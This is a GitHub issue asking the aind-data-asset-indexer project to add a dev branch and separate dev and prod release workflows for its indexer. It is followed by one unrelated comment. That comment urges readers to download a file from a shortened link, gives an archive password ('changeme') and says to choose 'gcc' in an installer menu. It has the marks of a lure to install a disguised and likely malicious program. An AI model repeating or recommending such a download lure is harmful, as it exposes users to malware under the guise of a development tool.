### ISSUE TITLE
Dev/main release workflow for indexer

### ISSUE THREAD

**Issue by helen-m-lin** [AllenNeuralDynamics/aind-data-asset-indexer#84]
**Is your feature request related to a problem? Please describe.**
This repo does not have a dev branch. The indexer in both dev and prod use the latest release of the package which is created whenever there is a merge to the main branch.

**Describe the solution you'd like**
- [ ] a dev branch should exist in this repo
- [ ] the indexer in dev should use the latest version in the dev branch
- [ ] the indexer in prod should use the latest version in the main branch

**Describe alternatives you've considered**

**Additional context**

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
